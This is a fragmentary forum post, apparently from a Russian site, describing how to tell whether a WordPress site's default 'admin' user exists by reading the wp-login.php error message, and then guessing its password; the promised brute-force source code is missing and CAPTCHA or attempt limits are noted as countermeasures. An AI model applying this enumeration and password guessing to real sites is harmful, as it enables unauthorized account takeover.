bruteforce( tab, number )
############## Source code ##################### The problem is : many time, the default user who is created is : admin, then you can try to crack the password, to stop that, you can use image confirmation or a limit for the connection (for example, only 5 tests). To know if "admin" is the default user, you can try to go to the login page : http://site.com/wp-login.php and you try ; login : admin, pass : test (or anything else). if "Wrong password" is printed on the page, the default user is admin, but if there is : "Wrong Username" then it's not the default password  Kad'
|
| |
| |
| Профиль | | Информация | Управление | |
|
| Сегодня: 2, 02.01.2025, 19:45
Вы используете: " v "
ВаШ внешний IP: "18.221.157.203" | У вас новых личных сообщений ·
Мой профиль | Выход
|
|
|
|
|
 |
| ... |
|
 |
|
| Пользователи |
|
|
|
|
| Поиск |
|
|
|
